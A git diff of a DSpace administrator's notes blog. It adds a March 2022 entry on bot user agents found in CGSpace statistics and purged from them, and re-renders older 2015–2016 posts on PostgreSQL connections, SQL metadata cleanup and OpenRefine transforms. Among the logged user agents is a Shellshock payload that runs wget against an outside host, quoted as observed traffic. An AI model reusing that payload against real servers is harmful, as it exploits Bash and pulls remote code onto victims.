diff --git a/content/posts/2022-03.md b/content/posts/2022-03.md index 74c121c0a..eca29392a 100644 --- a/content/posts/2022-03.md +++ b/content/posts/2022-03.md @@ -18,4 +18,56 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > +## 2022-03-04 + +- Looking over the CGSpace Solr statistics from 2022-02 + - I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more! + - Here are some of the more prevalent or weird ones: + - axios/0.21.1 + - Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com) + - Nutraspace/Nutch-1.2 (www.nutraspace.com) + - Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com) + - Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com + - Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/) + - Crowsnest/0.5 (+http://www.crowsnest.tv/) + - Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com + - metha/0.2.27 + - ZaloPC-win32-24v454 + - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x + - ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org) + - FullStoryBot/1.0 (+https://www.fullstory.com) + - Link Validity Check From: http://www.usgs.gov + - OSPScraper (+https://www.opensyllabusproject.org) + - () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\" + - I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these +- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script: + +```console +]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p +Purging 6 hits from scalaj-http in statistics +Purging 5 hits from lua-resty-http in statistics +Purging 9 hits from AHC in statistics +Purging 7 hits from acebookexternalhit in statistics +Purging 1011 hits from axios\/[0-9] in statistics +Purging 2216 hits from Faveeo\/[0-9] in statistics +Purging 1164 hits from Moreover\/[0-9] in statistics +Purging 740 hits from Exploratodo\/[0-9] in statistics +Purging 585 hits from GroupHigh\/[0-9] in statistics +Purging 438 hits from Crowsnest\/[0-9] in statistics +Purging 1326 hits from nbertaupete95 in statistics +Purging 182 hits from metha\/[0-9] in statistics +Purging 68 hits from ZaloPC-win32-24v454 in statistics +Purging 1644 hits from Firefox\/x\.x in statistics +Purging 678 hits from ZoteroTranslationServer in statistics +Purging 27 hits from FullStoryBot in statistics +Purging 26 hits from Link Validity Check in statistics +Purging 26 hits from OSPScraper in statistics +Purging 1 hits from 3137382e37392e3138372e313832 in statistics +Purging 2755 hits from Nutch-[0-9] in statistics + +Total number of bot hits purged: 12914 +``` + +- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project + diff --git a/docs/2015-11/index.html b/docs/2015-11/index.html index 0b48d1474..a0dba88bb 100644 --- a/docs/2015-11/index.html +++ b/docs/2015-11/index.html @@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace 78 "/> - + @@ -126,7 +126,7 @@ $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspac
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
78
- For now I have increased the limit from 60 to 90, run updates, and rebooted the server
@@ -137,7 +137,7 @@ $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspac
- Getting emails from uptimeRobot and uptimeButler that it’s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors
- Looks like there are still a bunch of idle PostgreSQL connections:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
96
- For some reason the number of idle connections is very high since we upgraded to DSpace 5
@@ -167,12 +167,12 @@ location ~ /(themes|static|aspects/ReportingSuite) {
- Need to check
/about
on CGSpace, as it’s blank on my local test server and we might need to add something there
- CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):
-$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
93
- I looked closer at the idle connections and saw that many have been idle for hours (current time on server is
2015-11-25T20:20:42+0000
):
-$ psql -c 'SELECT * from pg_stat_activity;' | less -S
+$ psql -c 'SELECT * from pg_stat_activity;' | less -S
datid | datname | pid | usesysid | usename | application_name | client_addr | client_hostname | client_port | backend_start | xact_start |
-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
20951 | cgspace | 10966 | 18205 | cgspace | | 127.0.0.1 | | 37731 | 2015-11-25 13:13:02.837624+00 | | 20
@@ -197,7 +197,7 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
Monitoring e-mailed in the evening to say CGSpace was down
Idle connections in PostgreSQL again:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
66
- At the time, the current DSpace pool size was 50…
@@ -215,7 +215,7 @@ db.statementpool = true
- And idle connections:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
49
- Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace’s thirst can ever be quenched
diff --git a/docs/2015-12/index.html b/docs/2015-12/index.html
index c1bbaed7e..4c9853f03 100644
--- a/docs/2015-12/index.html
+++ b/docs/2015-12/index.html
@@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
"/>
-
+
@@ -137,7 +137,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
- CGSpace went down again (due to PostgreSQL idle connections of course)
- Current database settings for DSpace are
db.maxconnections = 30
and db.maxidle = 8
, yet idle connections are exceeding this:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
39
- I restarted PostgreSQL and Tomcat and it’s back
@@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
- CGSpace very slow, and monitoring emailing me to say its down, even though I can load the page (very slowly)
- Idle postgres connections look like this (with no change in DSpace db settings lately):
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
29
- I restarted Tomcat and postgres…
@@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
- CGSpace has been up and down all day and REST API is completely unresponsive
- PostgreSQL idle connections are currently:
-postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
28
- I have reverted all the pgtune tweaks from the other day, as they didn’t fix the stability issues, so I’d rather not have them introducing more variables into the equation
diff --git a/docs/2016-01/index.html b/docs/2016-01/index.html
index 5dc10cc9b..f84804af9 100644
--- a/docs/2016-01/index.html
+++ b/docs/2016-01/index.html
@@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
Update GitHub wiki for documentation of maintenance tasks.
"/>
-
+
@@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
- Tweak date-based facets to show more values in drill-down ranges (#162)
- Need to remember to clear the Cocoon cache after deployment or else you don’t see the new ranges immediately
- Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account
-- Altmetrics' support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.
+- Altmetrics’ support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.
2016-01-21
diff --git a/docs/2016-02/index.html b/docs/2016-02/index.html
index e9eb2e083..88805586e 100644
--- a/docs/2016-02/index.html
+++ b/docs/2016-02/index.html
@@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
Not only are there 49,000 countries, we have some blanks (25)…
Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE”
"/>
-
+
@@ -145,15 +145,15 @@ Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE&r
- In this case our country field is 78
- Now find all resources with type 2 (item) that have null/empty values for that field:
-dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
+dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
- Then you can find the handle that owns it from its
resource_id
:
-dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
+dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
- It’s 25 items so editing in the web UI is annoying, let’s try SQL!
-dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
+dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
DELETE 25
- After that perhaps a regular
dspace index-discovery
(no -b) should suffice…
@@ -198,7 +198,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
- Add CATALINA_OPTS in
/opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh
, as this script is sourced by the catalina
startup script
- For example:
-CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
+CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
- After verifying that the site is working, start a full index:
@@ -253,7 +253,7 @@ Swap: 255 57 198
There are 1200 records that have PDFs, and will need to be imported into CGSpace
I created a filename
column based on the dc.identifier.url
column using the following transform:
-value.split('/')[-1]
+value.split('/')[-1]
- Then I wrote a tool called
generate-thumbnails.py
to download the PDFs and generate thumbnails for them, for example:
@@ -278,13 +278,13 @@ Processing 64195.pdf
Looking at CIAT’s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I’m not sure if we can use those
265 items have dirty, URL-encoded filenames:
-$ ls | grep -c -E "%"
+$ ls | grep -c -E "%"
265
- I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames
- This python2 snippet seems to work in the CLI, but not so well in OpenRefine:
-$ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
+$ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
- Merge pull requests for submission form theming (#178) and missing center subjects in XMLUI item views (#176)
@@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
- Turns out OpenRefine has an unescape function!
-
value.unescape("url")
+value.unescape("url")
- This turns the URLs into human-readable versions that we can use as proper filenames
- Run web server and system updates on DSpace Test and reboot
@@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
- Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with “||” in between
- Work on Python script for parsing and downloading PDF records from
dc.identifier.url
- To get filenames from
dc.identifier.url
, create a new column based on this transform: forEach(value.split('||'), v, v.split('/')[-1]).join('||')
-- This also works for records that have multiple URLs (separated by “||")
+- This also works for records that have multiple URLs (separated by “||”)
2016-02-17
@@ -325,7 +325,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
- To change Spanish accents to ASCII in OpenRefine:
-
value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
+value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
- But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac
- On closer inspection, I can import files with the following names on Linux (DSpace Test):
@@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
- Looking at the filenames for the CIAT Reports, some have some really ugly characters, like:
'
or ,
or =
or [
or ]
or (
or )
or _.pdf
or ._
etc
- It’s tricky to parse those things in some programming languages so I’d rather just get rid of the weird stuff now in OpenRefine:
-value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
+value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
- Finally import the 1127 CIAT items into CGSpace: https://cgspace.cgiar.org/handle/10568/35710
- Re-deploy CGSpace with the Google Scholar fix, but I’m waiting on the Atmire fixes for now, as the branch history is ugly
diff --git a/docs/2016-03/index.html b/docs/2016-03/index.html
index 3f914d7dc..c731dfece 100644
--- a/docs/2016-03/index.html
+++ b/docs/2016-03/index.html
@@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module
Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
"/>
-
+
@@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
- I identified one commit that causes the issue and let them know
- Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:
-Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
+Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
2016-03-08
- Add a few new filters to Atmire’s Listings and Reports module (#180)
@@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
- Abenet is having problems saving group memberships, and she gets this error: https://gist.github.com/alanorth/87281c061c2de57b773e
-
Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
+Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
- I can reproduce the same error on DSpace Test and on my Mac
- Looks to be an issue with the Atmire modules, I’ve submitted a ticket to their tracker.
diff --git a/docs/2016-04/index.html b/docs/2016-04/index.html
index 39b956379..5d4cf4f66 100644
--- a/docs/2016-04/index.html
+++ b/docs/2016-04/index.html
@@ -32,7 +32,7 @@ After running DSpace for over five years I’ve never needed to look in any
This will save us a few gigs of backup space we’re paying for on S3
Also, I noticed the checker log has some errors we should pay attention to:
"/>
-
+
@@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
******************************************************
- So this would be the
tomcat7
Unix user, who seems to have a default limit of 1024 files in its shell
-- For what it’s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in
/etc/default/tomcat7
)
+- For what it’s worth, we have been setting the actual Tomcat 7 process’ limit to 16384 for a few years (in
/etc/default/tomcat7
)
- Looks like cron will read limits from
/etc/security/limits.*
so we can do something for the tomcat7 user there
- Submit pull request for Tomcat 7 limits in Ansible dspace role (#30)
@@ -159,10 +159,10 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
Reduce Amazon S3 storage used for logs from 46 GB to 6GB by deleting a bunch of logs we don’t need!
# s3cmd ls s3://cgspace.cgiar.org/log/ > /tmp/s3-logs.txt
-# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
-# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
-# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
-# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
- Also, adjust the cron jobs for backups so they only backup
dspace.log
and some stats files (.dat)
- Try to do some metadata field migrations using the Atmire batch UI (
dc.Species
→ cg.species
) but it took several hours and even missed a few records
@@ -199,13 +199,13 @@ UPDATE 51258
- Looking at the DOI issue reported by Leroy from CIAT a few weeks ago
- It seems the
dx.doi.org
URLs are much more proper in our repository!
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
count
-------
5638
(1 row)
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
count
-------
3
@@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
I decided to keep the set of subjects that had FMD
and RANGELANDS
added, as it appears to have been requested to have been added, and might be the newer list
I found 226 blank metadatavalues:
-dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
+dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
- I think we should delete them and do a full re-index:
-dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
+dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
DELETE 226
- I deleted them on CGSpace but I’ll wait to do the re-index as we’re going to be doing one in a few days for the metadata changes anyways
@@ -294,7 +294,7 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
UPDATE 3872
UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
UPDATE 46075
-$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
+$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
- CGSpace was down but I’m not sure why, this was in
catalina.out
:
@@ -387,7 +387,7 @@ UPDATE 46075
Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)
Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:
-$ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
+$ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
21252
- I found a recent discussion on the DSpace mailing list and I’ve asked for advice there
@@ -423,7 +423,7 @@ UPDATE 46075
- Looks like the last one was “down” from about four hours ago
- I think there must be something with this REST stuff:
-# grep -c "Aborting context in finally statement" dspace.log.2016-04-*
+# grep -c "Aborting context in finally statement" dspace.log.2016-04-*
dspace.log.2016-04-01:0
dspace.log.2016-04-02:0
dspace.log.2016-04-03:0
diff --git a/docs/2016-05/index.html b/docs/2016-05/index.html
index edad6ad1f..330d7e837 100644
--- a/docs/2016-05/index.html
+++ b/docs/2016-05/index.html
@@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
# awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
3168
"/>
-
+
@@ -126,7 +126,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
I have blocked access to the API now
There are 3,000 IPs accessing the REST API in a 24-hour period!
-# awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
+# awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
3168
- The two most often requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29
@@ -166,8 +166,8 @@ LE_RESULT=$?
$SERVICE_BIN nginx start
-if [[ "$LE_RESULT" != 0 ]]; then
- echo 'Automated renewal failed:'
+if [[ "$LE_RESULT" != 0 ]]; then
+ echo 'Automated renewal failed:'
cat /var/log/letsencrypt/renew.log
@@ -240,7 +240,7 @@ fi
- Found ~200 messed up CIAT values in
dc.publisher
:
-# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "% %";
+# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "% %";
2016-05-13
- More theorizing about CGcore
@@ -259,7 +259,7 @@ fi
- They have thumbnails on Flickr and elsewhere
- In OpenRefine I created a new
filename
column based on the thumbnail
column with the following GREL:
-if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
+if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
- Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL
- So for the
hqdefault.jpg
ones I just take the UUID (-2) and use it as the filename
@@ -269,7 +269,7 @@ fi
- More quality control on
filename
field of CCAFS records to make processing in shell and SAFBuilder more reliable:
-
value.replace('_','').replace('-','')
+value.replace('_','').replace('-','')
- We need to hold off on moving
dc.Species
to cg.species
because it is only used for plants, and might be better to move it to something like cg.species.plant
- And
dc.identifier.fund
is MOSTLY used for CPWF project identifier but has some other sponsorship things
@@ -281,17 +281,17 @@ fi
-# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
+# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
2016-05-20
- More work on CCAFS Video and Images records
- For SAFBuilder we need to modify filename column to have the thumbnail bundle:
-value + "__bundle:THUMBNAIL"
+value + "__bundle:THUMBNAIL"
- Also, I fixed some weird characters using OpenRefine’s transform with the following GREL:
-value.replace(/\u0081/,'')
+value.replace(/\u0081/,'')
- Write shell script to resize thumbnails with height larger than 400: https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256
- Upload 707 CCAFS records to DSpace Test
@@ -314,7 +314,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
- And then import to CGSpace:
-$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
+$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
- But now we have double authors for “CGIAR Research Program on Climate Change, Agriculture and Food Security” in the authority
- I’m trying to do a Discovery index before messing with the authority index
@@ -322,12 +322,12 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
- Run system updates on DSpace Test, re-deploy code, and reboot the server
- Clean up and import ~200 CTA records to CGSpace via CSV like:
-$ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
+$ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &> ~/CTA-May30/CTA-42229.log
- Discovery indexing took a few hours for some reason, and after that I started the
index-authority
script
-$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
+$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
2016-05-31
- The
index-authority
script ran over night and was finished in the morning
diff --git a/docs/2016-06/index.html b/docs/2016-06/index.html
index f941e4199..8c132040d 100644
--- a/docs/2016-06/index.html
+++ b/docs/2016-06/index.html
@@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
"/>
-
+
@@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
- You can see the others by using the OAI
ListSets
verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
- Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in
dc.identifier.fund
to cg.identifier.cpwfproject
and then the rest to dc.description.sponsorship
-dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
+dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
UPDATE 497
dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
UPDATE 14
@@ -160,7 +160,7 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
So the only difference is the “confidence”
Ok, well THAT is interesting:
-dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
+dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, A. | ab606e3a-2b04-4c7d-9423-14beccf54257 | -1
@@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
- And now an actually relevent example:
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
count
-------
707
(1 row)
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
count
-------
253
@@ -194,7 +194,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
- Trying something experimental:
-dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
UPDATE 960
- And then re-indexing authority and Discovery…?
@@ -244,7 +244,7 @@ UPDATE 960
- Looks like this is all we need: https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies
- I wrote an XPath expression to extract the ILRI subjects from
input-forms.xml
(from the xmlstarlet package):
-$ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
+$ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
- Write to Atmire about the use of
atmire.orcid.id
to see if we can change it
- Seems to be a virtual field that is queried from the authority cache… hmm
@@ -263,9 +263,9 @@ UPDATE 960
- It looks like the values are documented in
Choices.java
- Experiment with setting all 960 CCAFS author values to be 500:
-dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
-dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
UPDATE 960
- After the database edit, I did a full Discovery re-index
@@ -320,7 +320,7 @@ UPDATE 960
- CGSpace’s HTTPS certificate expired last night and I didn’t notice, had to renew:
-
